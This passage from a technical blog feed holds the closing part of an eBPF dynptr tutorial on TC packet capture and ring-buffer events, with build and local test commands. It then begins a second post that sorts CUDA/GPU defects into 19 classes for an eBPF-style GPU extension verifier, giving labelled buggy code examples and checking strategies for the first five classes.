The userspace program loads the BPF skeleton, configures it through the array map, and attaches to TC ingress. The ring buffer callback handle_event() receives each variable-length event and prints it.

Notice how we access the variable-length payload. The struct event_hdr has a flexible array member payload[] at the end. When an event arrives, data_sz tells us the total size, and e->snap_len tells us specifically how much payload was included. We validate both before accessing the payload bytes.
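The two-step validation can be written as a small standalone helper. This is a sketch under stated assumptions: the struct event_hdr layout below is a guess based on the fields the BPF program initializes (the real definition lives in dynptr_tc.h, which is not shown here), and event_payload() is a hypothetical name. Unlike the callback above, it also checks that the record is large enough to contain the header before reading snap_len.

```c
#include <stddef.h>
#include <stdint.h>

/* Assumed layout for illustration; the real struct is in dynptr_tc.h */
struct event_hdr {
    uint64_t ts_ns;
    uint32_t ifindex;
    uint32_t pkt_len;
    uint32_t saddr;
    uint32_t daddr;
    uint16_t sport;
    uint16_t dport;
    uint8_t  drop;
    uint8_t  pad;
    uint16_t snap_len;
    uint8_t  payload[];     /* flexible array member: snap_len bytes follow */
};

/* The producer writes the payload at offset sizeof(hdr), so the layout must
 * not have tail padding between the last field and payload[]. */
_Static_assert(sizeof(struct event_hdr) == offsetof(struct event_hdr, payload),
               "payload must start exactly at sizeof(struct event_hdr)");

/* Hypothetical helper: return the payload and its length, or NULL if the
 * record is too short for the header or for the advertised snapshot. */
static const uint8_t *event_payload(const void *data, size_t data_sz, size_t *len)
{
    const struct event_hdr *e = data;

    if (data_sz < sizeof(*e))
        return NULL;                        /* header itself is truncated */
    if (e->snap_len > data_sz - sizeof(*e))
        return NULL;                        /* advertised payload does not fit */

    *len = e->snap_len;
    return e->payload;
}
```

The static assertion matters because a struct with a flexible array member may have a sizeof larger than the offset of that member. If that happened, a producer writing at sizeof(hdr) and a consumer reading e->payload would disagree about where the payload starts.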

The configuration map allows runtime control over blocking behavior and snapshot length without reloading the BPF program. This demonstrates the common pattern of using maps for user-to-kernel communication.

Compilation and Execution

Navigate to the dynptr directory and build:

cd bpf-developer-tutorial/src/features/dynptr
make

This compiles the BPF program with the repository's standard toolchain, generating the skeleton header and linking against libbpf.

Creating a Test Environment

To test properly, we need a network namespace so traffic actually traverses the veth pair rather than going through loopback. The included test.sh script handles this automatically, but here's the manual setup:

# Create network namespace
sudo ip netns add test_ns

# Create veth pair with one end in the namespace
sudo ip link add veth_host type veth peer name veth_ns
sudo ip link set veth_ns netns test_ns

# Configure host side
sudo ip addr add 10.200.0.1/24 dev veth_host
sudo ip link set veth_host up

# Configure namespace side
sudo ip netns exec test_ns ip addr add 10.200.0.2/24 dev veth_ns
sudo ip netns exec test_ns ip link set veth_ns up

# Start HTTP server inside the namespace
sudo ip netns exec test_ns python3 -m http.server 8080 --bind 10.200.0.2 &

Running the Demo

Start the dynptr TC program attached to the host side of the veth:

sudo ./dynptr_tc -i veth_host -p 0 -s 32

In another terminal, make a request:

curl http://10.200.0.2:8080/

You should see output showing captured packets:

Attached to TC ingress of veth_host (ifindex=X). Ctrl-C to exit.
blocked_port=0 snap_len=32 ringbuf=1
if=X 10.200.0.2:8080 -> 10.200.0.1:XXXXX len=221 drop=0 snap=32 payload="HTTP/1.0 200 OK..Server: SimpleH"
if=X 10.200.0.2:8080 -> 10.200.0.1:XXXXX len=742 drop=0 snap=32 payload="<!DOCTYPE HTML>.<html lang="en">"

The output shows HTTP response packets from the server, with the payload field containing the beginning of the response data.

Testing the Drop Policy

Test blocking by specifying port 8080:

sudo ./dynptr_tc -i veth_host -p 8080 -s 32

In another terminal:

curl --max-time 3 http://10.200.0.2:8080/

The curl command should time out, since the response packets are dropped on ingress at veth_host. The dynptr_tc output shows drop=1:

if=X 10.200.0.2:8080 -> 10.200.0.1:XXXXX len=74 drop=1 snap=0

Using the Test Script

For convenience, run the included test script which handles all setup automatically:

sudo ./test.sh

This creates the namespace, runs both capture and blocking tests, and cleans up afterward.

When to Use Dynptrs

Dynptrs shine in several scenarios. Variable-length events are the classic use case since ringbuf dynptrs let you allocate exactly the size you need at runtime, avoiding wasted space from oversized fixed structures or complex multi-record schemes.

Packet parsing benefits from dynptrs when dealing with non-linear skbs or complex protocol stacks where traditional bounds checking becomes unwieldy. The slice API provides a cleaner abstraction that handles both linear and paged data uniformly.

Several newer kfuncs, such as bpf_crypto_encrypt(), bpf_verify_pkcs7_signature(), and bpf_get_file_xattr(), take dynptrs as buffer arguments, so familiarity with dynptrs is essential for crypto, signature verification, and extended-attribute use cases.

User ringbuf consumption through bpf_user_ringbuf_drain() delivers samples as dynptrs, enabling safe handling of userspace-provided data in BPF programs.

For simple fixed-size operations where you know bounds at compile time, traditional approaches may be simpler. But as your BPF programs grow more sophisticated, dynptrs become increasingly valuable.

Summary

BPF dynptrs provide a verifier-friendly mechanism for working with variable-length and runtime-bounded data. Rather than proving memory safety entirely through static analysis, dynptrs shift some verification to runtime checks, enabling patterns that would otherwise be impossible or extremely awkward to express.

Our example demonstrated the two primary dynptr patterns: using skb dynptrs with slices for clean packet parsing, and using ringbuf dynptrs for variable-length event output. The key takeaways are to always NULL-check slice returns, always submit or discard ringbuf dynptrs, and remember that skb dynptrs require kfuncs available from Linux v6.4.

As eBPF capabilities continue to expand, dynptrs form an increasingly important part of the toolkit. Whether you're building packet processors, security monitors, or performance tools, understanding dynptrs will help you write cleaner, more capable BPF programs.

If you'd like to dive deeper into eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

References

Dynptr Concept Documentation: https://docs.ebpf.io/linux/concepts/dynptrs/
bpf_ringbuf_reserve_dynptr Helper: https://docs.ebpf.io/linux/helper-function/bpf_ringbuf_reserve_dynptr/
bpf_dynptr_from_skb Kfunc: https://docs.ebpf.io/linux/kfuncs/bpf_dynptr_from_skb/
bpf_dynptr_slice Kfunc: https://docs.ebpf.io/linux/kfuncs/bpf_dynptr_slice/
Kernel Kfuncs Documentation: https://docs.kernel.org/bpf/kfuncs.html
Tutorial Repository: https://github.com/eunomia-bpf/bpf-developer-tutorial

This example requires Linux kernel 6.4 or newer for the skb dynptr kfuncs. The ringbuf dynptr helpers are available from Linux 5.19. Complete source code is available in the tutorial repository.

A Taxonomy of GPU Bugs: 19 Defect Classes for CUDA Verification

云微 — Tue, 10 Feb 2026 07:53:16 +0000

Introduction

GPU programming introduces a distinct class of correctness and performance challenges that differ fundamentally from traditional CPU-based systems. The SIMT (Single Instruction, Multiple Threads) execution model, hierarchical memory architecture, and massive parallelism create unique bug patterns that require specialized verification and detection techniques.

Just as eBPF enables safe, verified extension code to run inside the Linux kernel, bpftime gpu_ext (described in an arXiv paper and previously named eGPU) brings eBPF to GPUs, allowing user-defined policy code (for observability, scheduling, or resource control) to be injected into GPU drivers and kernels with static verification guarantees. Such a GPU extension framework must ensure that policy code cannot introduce crashes, hangs, data races, or unbounded overhead. A critical concern in modern GPU deployments is performance interference in multi-tenant environments: contention for shared resources makes execution time unpredictable. "Making Powerful Enemies on NVIDIA GPUs" studies how adversarial kernels can amplify slowdowns, arguing that performance interference is a system-level safety property when GPUs are shared. This motivates treating bounded overhead as a correctness property, not merely an optimization goal.

To build a sound GPU extension verifier, we must first understand what can go wrong. This taxonomy identifies the defect classes a verifier must address, drawing lessons from eBPF's success: restrict the programming model, enforce bounded execution, and verify memory safety before loading. We synthesize findings from static verifiers (GPUVerify, GKLEE, ESBMC-GPU), dynamic detectors (Compute Sanitizer, Simulee, CuSan), and empirical bug studies (Wu et al., ScoRD, iGUARD) into 19 defect classes organized along two dimensions: impact type (Safety, Correctness, Performance) and GPU specificity (GPU-specific, GPU-amplified, CPU-shared). Each entry provides concrete examples, documents detection tools, and offers actionable verification strategies.

Taxonomy Overview

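Each bug class is categorized along four dimensions: the two primary ones (impact type and GPU specificity), plus verification scope and assurance type, which matter specifically for GPU extension frameworks: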

Impact Type:

Safety: Program fails to complete safely (crash, hang, isolation failure, deadlock)
Correctness: Program completes but produces wrong results
Performance: Program works correctly but inefficiently

GPU Specificity:

GPU-specific: Unique to GPU/SIMT execution model
GPU-amplified: Exists on CPUs but much more severe on GPUs
CPU-shared: Similar on both platforms

Verification Scope (for GPU extension frameworks):

E (Extension-local): Can be verified by examining only the extension/policy code, without inspecting the host kernel. This is the ideal case: like eBPF, the verifier can provide strong safety guarantees for any kernel the extension attaches to.
C (Combined): Requires joint analysis of extension + kernel, or a contract between them. These bugs arise from interactions between policy code and kernel state/behavior.
H (Host+Device/System): Involves host-side API ordering, driver state, or cross-boundary interactions that cannot be verified by device-side analysis alone.

Assurance Type (Soundness/Completeness guarantees):

By-construction: Bug class is structurally impossible due to language/feature restrictions. Soundness: perfect (the bug cannot exist). Completeness: high for policy use cases (restrictions rarely limit legitimate policies).
Static-sound: If verifier accepts, property holds; but some safe programs rejected. Soundness: strong. Completeness: low (conservative).
Contract-based: Requires declared preconditions validated at attach/launch time. Soundness: conditional on contract correctness. Completeness: depends on contract expressiveness.
Bounded-sound: Sound within specified bounds (loop unrolling, context switches). Soundness: within bounds. Completeness: limited by bound coverage.
Dynamic-only: Detected at runtime; no static guarantee. Soundness: for executed paths only. Completeness: coverage-dependent.
Runtime-enforced: Property enforced via instrumentation/interception. Soundness: if enforcement is complete. Completeness: N/A (enforcement, not verification).
Static-heuristic: Static pattern checks flag or reject code that is likely to be problematic (used below for the performance classes #7 and #12). Soundness: best-effort, not guaranteed. Completeness: pattern-dependent.

Why These Dimensions Matter for GPU Extension Verifiers

A GPU extension framework (like bpftime gpu_ext) aims to provide static verification guarantees analogous to eBPF: policy code should be safe to attach to any kernel without risking crashes, hangs, or unbounded overhead. The key insight is:

Extension-local verification is the only path to strong, universal guarantees. If a bug class can be eliminated by restricting the policy language or enforcing invariants on policy code alone, the verifier can guarantee safety without inspecting (potentially closed-source) kernels.

For Combined bugs, the framework has two options: (1) restrict policy capabilities so the bug becomes Extension-local (e.g., forbid policies from writing kernel memory), or (2) require kernel-side contracts/annotations and validate at attach time.

For Host+Device bugs, device-side verification is insufficient; these require host-side tooling (CuSan, TSan) or runtime enforcement in the driver/loader.

Understanding Soundness vs. Completeness

The Assurance Type dimension makes explicit what guarantees each verification approach provides:

Soundness answers: "If the verifier accepts, does the property definitely hold?" A sound verifier never produces false negatives: it never accepts a program that contains a real bug.
Completeness answers: "If the property holds, will the verifier accept?" A complete verifier never produces false positives: it never rejects a safe program.

For safety-critical GPU extensions, we prioritize soundness over completeness: it's acceptable to reject some safe policies if it means we never accept unsafe ones. The table below shows not just what can be verified, but how strong the guarantee is.

#	Bug Class	Impact	GPU Spec.	Scope	Assurance Type
1	Barrier Divergence	Safety	GPU-specific	E	Static-sound (enforce uniform barrier placement)
2	Invalid Warp Sync	Safety	GPU-specific	E	By-construction (ban warp sync)
3	Insufficient Atomic/Sync Scope	Correctness	GPU-specific	C→E	Static-sound (isolate state + device-scope)
4	Warp-divergence Race	Correctness	GPU-specific	E	Static-sound (uniform side-effects)
5	Uncoalesced Memory Access	Performance	GPU-specific	E/C	Static-sound (restrict patterns)
6	Control-Flow Divergence	Performance	GPU-specific	E	Static-sound (enforce uniformity)
7	Bank Conflicts	Performance	GPU-specific	E	Static-heuristic (enforce conflict-free patterns)
8	Block-Size Dependence	Correctness	GPU-specific	E/C	Contract-based (declare requirements)
9	Launch Config Assumptions	Correctness	GPU-specific	C	Contract-based (validate at attach)
10	Missing Volatile/Fence	Correctness	GPU-specific	E	By-construction (ban spin-wait)
11	Shared-Memory Data Races	Correctness	GPU-specific	E	Static-sound (restrict writes)
12	Redundant Barriers	Performance	GPU-specific	E	Static-heuristic (detect unnecessary barriers)
13	Host ↔ Device Async Races	Correctness	GPU-specific	H	Dynamic-only (CuSan/TSan)
14	Atomic Contention	Performance	GPU-amplified	C→E	Static-sound (budgetize atomics)
15	Non-Barrier Deadlocks	Safety	GPU-amplified	E	By-construction (ban blocking)
16	Kernel Non-Termination	Safety	GPU-amplified	E	Static-sound (bound iterations)
17	Global-Memory Data Races	Correctness	CPU-shared	C→E	Static-sound (isolate state)
18	Memory Safety	Safety	CPU-shared	E	Static-sound (restrict pointers)
19	Arithmetic Errors	Correctness	CPU-shared	E	Static-sound (range analysis)

Insights from a Taxonomy of GPU Defects

We conducted a comprehensive study of GPU correctness defects by synthesizing findings from empirical bug analyses (Wu et al., iGUARD), static verifiers (GPUVerify, GKLEE, ESBMC-GPU), and runtime detectors (Compute Sanitizer, Simulee, ScoRD). Our taxonomy identifies 19 distinct classes of GPU programming defects, uncovering fundamental insights into the unique correctness challenges posed by GPU architectures:

First, we observe that control-flow uniformity is a foundational correctness requirement for GPU kernels. Under the GPU's SIMT execution model, non-uniform execution across threads breaks implicit synchronization assumptions and triggers GPU-specific correctness violations, such as barrier divergence, warp synchronization errors, and subtle warp-divergence races. This insight elevates uniformity from a performance concern to a correctness property that GPU verification frameworks must explicitly enforce.

Second, GPU's scoped memory synchronization semantics (e.g., block-scoped atomics, missing fences, volatile misuse) create unique correctness hazards rarely encountered on CPU platforms. Our analysis emphasizes that synchronization primitives' scopes must be explicit, conservative, and verifiable at the kernel level. This requirement is critical for correctness given GPU memory model subtleties.

Third, performance interference in GPUs, manifested as uncoalesced accesses, atomic contention, redundant barriers, and bank conflicts, must be viewed as a safety and isolation concern rather than mere inefficiency. Our taxonomy reveals how adversarial workloads exploit GPU parallelism to amplify performance issues into denial-of-service attacks in multi-tenant environments. Consequently, bounded overhead must be explicitly enforced as a correctness property in GPU extension frameworks.

Finally, our study highlights that liveness (deadlocks, infinite loops) and memory safety (out-of-bounds accesses, temporal violations) are system-level concerns uniquely amplified by GPU parallelism. Unlike traditional CPU environments, GPU kernel hangs or memory violations can trigger hardware-level recovery affecting all tenants. Thus, GPU liveness and memory safety must be explicitly recognized as first-class system-level correctness properties in verifier designs.

Together, these insights not only characterize GPU correctness issues more precisely but also inform principled design requirements for GPU kernel extensibility and verification frameworks, moving beyond traditional CPU-centric correctness towards a GPU-aware system correctness definition. We are applying these principles in bpftime; more detail is available on arXiv.

Insights from Verification Scope and Assurance Analysis

Beyond characterizing what can go wrong, we analyze whether and how each bug class can be addressed by a GPU extension verifier. By examining each defect through the lens of verification scope (Extension-local vs. Combined vs. Host+Device) and assurance type (soundness and completeness guarantees), we arrive at several key conclusions for GPU extension framework design.

Extension-local verification is sufficient for the majority of GPU bug classes. Of the 19 defect classes identified, 12 can be fully addressed through Extension-local verification, examining only the policy code without inspecting the host kernel. Some of these (#2, #10, #15) can be eliminated by construction through language restrictions: banning warp sync primitives, spin-wait patterns, and blocking constructs makes entire bug classes structurally impossible. Others (#1, #7, #12) use static analysis to enforce safe usage patterns (uniform barrier placement, conflict-free shared-memory access, redundant barrier detection) rather than outright bans, preserving useful functionality while maintaining safety. Four additional classes (#3, #5, #14, #17) that initially appear to require Combined analysis can be reduced to Extension-local through state isolation, restricting policies to write only policy-owned objects (maps, ringbuffers) rather than kernel data structures, which brings the total to 16 of 19. This finding validates the eBPF design philosophy: by appropriately restricting extension capabilities, a verifier can provide strong safety guarantees for any kernel, including closed-source ones.

Only three bug classes fundamentally resist Extension-local verification. Block-size dependence (#8) and launch configuration assumptions (#9) depend on host-determined launch parameters invisible to the policy verifier; these require a contract-based approach where policies declare preconditions validated at attach time. Host↔device async races (#13) span the host API boundary entirely outside device-side verification scope; these can only be addressed through dynamic detection tools like CuSan. Importantly, these three classes represent a small, well-defined subset that can be handled through complementary mechanisms rather than requiring full Combined verification of kernel+extension.

Soundness and completeness trade-offs are explicit and favorable for safety-critical extensions. By-construction approaches (banning genuinely dangerous features like spin-wait and blocking primitives) achieve perfect soundness with high completeness for policy use cases. Static-sound approaches (uniform barrier placement, conflict-free access pattern enforcement, uniformity analysis, bounds checking, range analysis) provide strong soundness while preserving useful functionality, at the cost of conservatively rejecting some safe programs. For safety-critical GPU extensions, this trade-off is appropriate: it is better to reject a safe policy than to accept an unsafe one. The verifier's job is to guarantee safety for any kernel, not to accept every possible safe program.

A two-track verification pipeline emerges as the principled design. The production track provides hard guarantees for any kernel through Extension-local verification at load time, contract validation at attach time, and optional runtime enforcement for multi-tenant isolation. The CI/offline track enhances coverage through Combined analysis tools (GPUVerify, ESBMC-GPU) when kernel source is available, dynamic sanitizers (Compute Sanitizer, iGUARD, Simulee) for regression testing, and host-side race detection (CuSan) for API ordering bugs. This separation acknowledges that Combined verification, while valuable for development and testing, cannot be a production requirement for systems targeting arbitrary kernels.

Performance interference can be bounded but not eliminated. While adversarial workloads can systematically amplify interference through shared GPU resources (as demonstrated by "Making Powerful Enemies on NVIDIA GPUs"), the verifier can still provide meaningful guarantees: bounding policy overhead per invocation through instruction/helper budgets, limiting atomic contention through warp-aggregation requirements, and enforcing coalesced access patterns. These guarantees bound the policy's contribution to interference, even if system-wide slowdown bounds remain impossible to guarantee statically.

In summary, the verification scope analysis reveals that the eBPF success pattern (restricting extension capabilities to what can be verified without inspecting the host) transfers effectively to GPUs. Through language restrictions, state isolation, and budgetization, a GPU extension verifier can provide strong, universal safety guarantees while relegating the few irreducibly Combined or Host+Device properties to contracts and dynamic detection.

Canonical bug list

1) Barrier Divergence at Block Barriers (`__syncthreads`) [Safety, GPU-specific]

What it is / why it matters

A block-wide barrier requires all threads in the block to reach it. If the barrier is placed under a condition that evaluates differently across threads, the threads that arrive wait forever for those that never do, resulting in a deadlock or kernel hang. This is treated as a first-class defect in GPU kernel verification (e.g., "barrier divergence" in GPUVerify), and is also one of the main CUDA synchronization bug types characterized/targeted by AuCS/Wu. General control-flow divergence is a performance issue; barrier divergence is the specific, critical case where divergent control flow causes threads to reach a barrier non-uniformly, turning that performance issue into a liveness/correctness failure (deadlock).

Bug example

__global__ void k(float* a) {
  if (threadIdx.x < 16) __syncthreads(); // divergent barrier => UB / deadlock
  a[threadIdx.x] = 1.0f;
}

Seen in / checked by

GPUVerify: checking divergence is a core goal ("divergence freedom").(Nathan Chong)
Simulee detects barrier divergence bugs in real-world code.(zhangyuqun.github.io)
Wu et al.: explicitly defines barrier divergence and places it under improper synchronization.(arXiv)
Tools like Compute Sanitizer synccheck report "divergent thread(s) in block"; Oclgrind can also detect barrier divergence (OpenCL).

Checking approach

Static check (GPUVerify-style): prove that each barrier is reached by all threads in the relevant scope, often via uniformity reasoning.(Nathan Chong)
Dynamic check: synccheck-style runtime validation, and Simulee-style bug finding.(zhangyuqun.github.io)

Verification strategy

Require warp-/block-uniform control flow for any path reaching a barrier (GPUVerify-style uniform predicate analysis): the verifier statically proves that every __syncthreads() is reached by all threads in the block, otherwise reject. This allows policies to use barriers for legitimate shared-memory coordination while preventing divergent barriers that cause deadlocks.
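
The uniformity requirement can be illustrated on the host. The C++ sketch below is not how GPUVerify or any real verifier works: it enumerates every thread index for one fixed block size and checks that a barrier guard evaluates identically for all of them. The name barrier_guard_is_uniform is hypothetical, and a static verifier would have to prove the same property symbolically for all block sizes and inputs.

```cpp
#include <cassert>
#include <functional>

// Hypothetical helper (not a GPUVerify or Compute Sanitizer API): returns true
// when `guard` evaluates identically for every thread index in the block, i.e.
// a barrier placed under `guard` is reached by all threads or by none.
bool barrier_guard_is_uniform(int block_dim,
                              const std::function<bool(int)>& guard) {
  assert(block_dim > 0);
  const bool first = guard(0);
  for (int tid = 1; tid < block_dim; ++tid) {
    if (guard(tid) != first) return false;  // some threads would skip the barrier
  }
  return true;
}
```

For the bug example above, the guard threadIdx.x < 16 is non-uniform for a 32-thread block but happens to be uniform for a 16-thread block. A load-time verifier that knows nothing about the launch configuration therefore has to reject it.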

Verification scope analysis

Scope & Assurance: Extension-local (E), Static-sound. Enforcing uniform barrier placement via static analysis prevents barrier divergence with strong soundness. Policies can use __syncthreads() when the verifier can prove all threads in the block reach the barrier uniformly.

Production guarantee: The verifier statically analyzes control flow to ensure every __syncthreads() call is reached by all threads in the block. Barriers under divergent conditions (e.g., if (threadIdx.x < 16) __syncthreads()) are rejected. This allows safe barrier usage for shared-memory coordination while preventing GPU hangs.

Offline/CI tools: For kernel-level analysis, GPUVerify proves divergence freedom via static verification; Compute Sanitizer synccheck detects divergent barriers at runtime; Simulee finds barrier divergence bugs through evolutionary simulation.

Residual gap: Some safe barrier placements under complex but provably uniform conditions may be conservatively rejected. The verifier guarantees policy cannot introduce barrier divergence, but cannot guarantee the kernel itself is free of this bug; kernel-level bugs require kernel-level tools.

2) Invalid Warp Synchronization (`__syncwarp` mask, warp-level barriers) [Safety, GPU-specific]

What it is / why it matters

Warp-level sync requires correct participation masks. A common failure is calling __syncwarp(mask) where not all lanes that reach the barrier are included in mask, or where divergence causes only a subset to arrive.

Bug example

__global__ void k(int* out) {
  int lane = threadIdx.x & 31;
  if (lane < 16) {
    __syncwarp(0xffffffff);  // only 16 lanes arrive, but mask expects all 32
  }
  out[threadIdx.x] = lane;
}

Seen in / checked by

Compute Sanitizer synccheck explicitly reports "Invalid arguments" and "Divergent thread(s) in warp" classes for these hazards.(NERSC Documentation)
iGUARD discusses how newer CUDA features (e.g., independent thread scheduling + cooperative groups) create new race/sync hazards beyond the classic model.(Aditya K Kamath)

Checking approach

Runtime validation via synccheck.
Static analysis to verify mask correctness at each __syncwarp callsite.

Verification strategy

If policies can ever emit warp-level sync or cooperative-groups barriers, require a verifiable mask discipline: e.g., only __syncwarp(0xffffffff) (full mask) or masks proven to equal the active mask at the callsite. Otherwise, the simplest option is to ban warp sync primitives entirely inside policies.
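
The mask discipline can be stated as a pair of bit tests. The following C++ sketch is a simplified host-side model that ignores exited lanes; the function names are hypothetical and are not part of CUDA or Compute Sanitizer. It encodes the rule that every lane executing __syncwarp(mask) must be named in the mask, and every lane named in the mask must execute the call.

```cpp
#include <cassert>
#include <cstdint>

// Bit i of a mask corresponds to lane i of a 32-lane warp.
std::uint32_t lane_bit(int lane) {
  assert(lane >= 0 && lane < 32);
  return std::uint32_t{1} << lane;
}

// Hypothetical model of the __syncwarp(mask) participation rule, ignoring
// exited lanes. `arriving` has bit i set when lane i executes the call.
bool warp_sync_mask_ok(std::uint32_t arriving, std::uint32_t mask) {
  const bool callers_named = (arriving & ~mask) == 0;  // no caller outside the mask
  const bool named_arrive = (mask & ~arriving) == 0;   // no named lane missing
  return callers_named && named_arrive;
}
```

In the bug example above, only lanes 0 to 15 arrive (0x0000ffff) while the mask names all 32 lanes, so the second test fails. A stricter policy verifier, as suggested in the text, would additionally insist that the mask is the full mask and the call site is warp-uniform.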

Verification scope analysis

Scope & Assurance: Extension-local (E), By-construction. Banning __syncwarp/CG barriers entirely (or requiring only full-mask sync at provably uniform points) makes invalid warp sync structurally impossible, providing perfect soundness with high completeness for policy use cases where warp-level sync is rarely needed.

Production guarantee: Policy code cannot introduce invalid warp synchronization because the verifier bans warp-level sync primitives. If allowed, only full-mask __syncwarp(0xffffffff) at provably uniform points is permitted.

Offline/CI tools: Compute Sanitizer synccheck reports invalid sync arguments and divergent warps at runtime; iGUARD provides NVBit-based instrumentation for detecting sync hazards from modern CUDA features.

Residual gap: iGUARD notes that ITS (Independent Thread Scheduling) and CG create new hazards that even experienced developers misuse. This justifies conservative restrictions; banning these primitives in policy code is the only sound approach without complex ITS-aware analysis.

3) Insufficient Atomic/Sync Scope [Correctness, GPU-specific]

What it is / why it matters

GPUs add scope and memory-model subtleties that don't exist on CPUs. Scoped races occur when synchronization/atomics are done at an insufficient scope (e.g., using atomicAdd_block when atomicAdd with device scope is needed). This is a distinct GPU bug class because scope semantics are unique to CUDA's memory model.

Bug example

// Scoped race: using block-scope atomic when device-scope is needed
__global__ void k(int* counter) {
  atomicAdd_block(counter, 1);  // only block-scope, may race across blocks
}

Seen in / checked by

ScoRD introduces scoped races due to insufficient scope and argues this is a distinct bug class.(CSA - IISc Bangalore)
iGUARD further targets races introduced by "scoped synchronization" and advanced CUDA features (independent thread scheduling, cooperative groups).(Aditya K Kamath)

Checking approach

Scope verification: ensure atomics/sync use sufficient scope for the access pattern.
Require explicit scope annotations and validate against access patterns.

Verification strategy

Treat scope as part of the verifier contract: if policies do atomic/synchronizing operations, require the strongest allowed scope (or forbid nontrivial scope usage). Practically: ban cross-block shared global updates unless they're done through a small set of "safe" helpers (e.g., per-SM/per-warp buffers → host aggregation). If policies use scoped atomics, require the scope to be explicit and conservative.

Verification scope analysis

Scope & Assurance: Combined → Extension-local (C→E) via state isolation, Static-sound. If policies can touch kernel-shared global objects, scope correctness depends on kernel access patterns (Combined). However, this reduces to Extension-local by restricting policies to write only policy-owned state or requiring all atomics to use device-scope by default, providing strong soundness with medium completeness (policies needing block-scope atomics must use conservative device-scope).

Production guarantee: Two design choices enable Extension-local verification: (A) Policy only writes policy-owned state (maps, ringbuffers), never kernel globals: scope becomes irrelevant; (B) All policy atomics use device-scope by default: sufficient for any access pattern. Both approaches eliminate scope bugs without kernel inspection.
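
Design choice (B) amounts to a simple ordering check on scopes. The sketch below is a minimal host-side model, assuming the three CUDA scopes (block, device, system) can be treated as a total order; the enum and function names are hypothetical and not taken from any verifier.

```cpp
#include <cassert>

// Scopes ordered from narrowest to widest (hypothetical model of CUDA's
// block / device / system scopes).
enum class Scope { Block = 0, Device = 1, System = 2 };

// An atomic is adequately scoped when its scope is at least as wide as the
// set of threads that may access the location.
bool scope_is_sufficient(Scope used, Scope required) {
  return static_cast<int>(used) >= static_cast<int>(required);
}

// Option (B): never let a policy atomic go below device scope.
Scope conservative_scope(Scope requested) {
  return scope_is_sufficient(requested, Scope::Device) ? requested
                                                       : Scope::Device;
}

// Usage mirroring the bug example: a block-scope atomic on a counter shared
// across blocks is insufficient, and the conservative default widens it.
void check_scope_examples() {
  assert(!scope_is_sufficient(Scope::Block, Scope::Device));
  assert(conservative_scope(Scope::Block) == Scope::Device);
}
```

Widening every policy atomic to device scope trades some performance for a rule the verifier can check without knowing how the kernel accesses the same location.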

Offline/CI tools: ScoRD introduces "scoped races" as a distinct bug class and provides detection (research prototype requiring hardware support); iGUARD targets races from scoped synchronization and advanced CUDA features via NVBit GPU-side runtime instrumentation.

Residual gap: If policies must write kernel-shared objects with fine-grained scope optimization, Combined analysis or contracts are required. ScoRD and iGUARD emphasize scope bugs are subtle and underdetected: defaulting to device-scope is a sound engineering choice.

4) Warp-divergence Race [Correctness, GPU-specific]

What it is / why it matters

A warp-divergence race is a GPU-specific phenomenon where divergence changes which threads are effectively concurrent, producing racy outcomes that don't map cleanly to CPU assumptions. SIMT execution order + reconvergence can create subtle concurrency patterns. This is one reason "CPU-style race reasoning" doesn't port directly to GPUs. While control-flow divergence is generally a performance issue (serialized execution paths), a warp-divergence race is a correctness issue in which divergence creates unexpected concurrency patterns that lead to data races. The root cause is the same, but the failure modes differ: performance degradation vs. racy/undefined behavior.

Bug example

__global__ void k(int* A) {
  int lane = threadIdx.x & 31;
  if (lane < 16) A[0] = 1;      // first half writes
  else           A[0] = 2;      // second half writes
  // outcome depends on SIMT execution + reconvergence
}

Seen in / checked by

GKLEE explicitly lists "warp-divergence race" among discovered bug classes.(Lingming Zhang)
Simulee stresses CUDA-aware race definitions and discusses GPU-specific race interpretation constraints (e.g., avoiding false positives due to warp lockstep).(zhangyuqun.github.io)

Checking approach

Verifier rule: treat "lane-divergent side effects" as forbidden unless proven safe.
Require that any helper with side effects is guarded by a warp-uniform predicate or executed only by a designated lane (e.g., lane0). Then the verifier only needs to prove uniformity (or single-lane execution), not full SIMT interleavings.

Verification strategy

Enforce warp-uniform control flow for policy side effects. If divergence is unavoidable, force "single-lane execution" patterns where only lane0 performs the side effect. This eliminates warp-divergence races by construction.
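
The rule can be pictured as a classification of the set of lanes that take a side-effecting branch. The C++ sketch below is a host-side model under the assumption of a fully active 32-lane warp; GuardKind and classify_guard are hypothetical names. A real verifier would have to establish the classification statically rather than inspect a concrete lane mask.

```cpp
#include <cassert>
#include <cstdint>

enum class GuardKind { WarpUniform, SingleLane, Divergent };

// `taken` has bit i set when lane i of a fully active 32-lane warp takes the
// branch that performs the side effect.
GuardKind classify_guard(std::uint32_t taken) {
  if (taken == 0u || taken == 0xffffffffu) return GuardKind::WarpUniform;
  if ((taken & (taken - 1u)) == 0u) return GuardKind::SingleLane;  // one bit set
  return GuardKind::Divergent;  // several, but not all, lanes write
}

// Usage mirroring the bug example: lanes 0..15 take one branch, lanes 16..31
// the other, so the guard is divergent; a lane-0-only guard is accepted.
void check_guard_examples() {
  assert(classify_guard(0x0000ffffu) == GuardKind::Divergent);
  assert(classify_guard(0x00000001u) == GuardKind::SingleLane);
}
```

This model accepts any single lane, whereas the text designates lane0 specifically; restricting SingleLane to the mask 0x1 would match that stricter rule.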

Verification scope analysis

Scope & Assurance: Extension-local (E), Static-sound. Warp-divergence races arise from SIMT execution semantics, but can be prevented by structural restrictions on policy code, providing strong soundness with medium completeness (legitimately safe lane-divergent writes are rejected).

Production guarantee: The verifier enforces that all side-effecting operations are either (1) under warp-uniform predicates, or (2) executed only by lane0 (single-lane execution pattern). This eliminates warp-divergence races without analyzing the kernel. The verifier proves uniformity or single-lane execution statically.

Offline/CI tools: GKLEE explicitly lists "warp-divergence race" among discovered bug classes and explores divergent execution paths via concolic/symbolic testing; Simulee uses CUDA-aware race definitions that account for warp lockstep behavior to avoid false positives.

Residual gap: Policies with legitimately safe lane-divergent writes will be rejected. This trade-off is favorable: warp-divergence races are notoriously subtle (GKLEE found them in real SDK code), so eliminating them by construction is safer than complex SIMT interleaving analysis.

5) Uncoalesced / Non-Coalesceable Global Memory Access Patterns [Performance, GPU-specific]

What it is / why it matters

Warp memory coalescing is a GPU-specific performance contract. "Uncoalesced" accesses can cause large slowdowns because a single warp-wide access is split into many memory transactions.

Bug example

__global__ void k(float* a, int stride) {
  int tid = blockIdx.x * blockDim.x + threadIdx.x;
  float x = a[tid * stride];   // stride>1 => likely uncoalesced
  a[tid * stride] = x + 1.0f;
}

Seen in / checked by

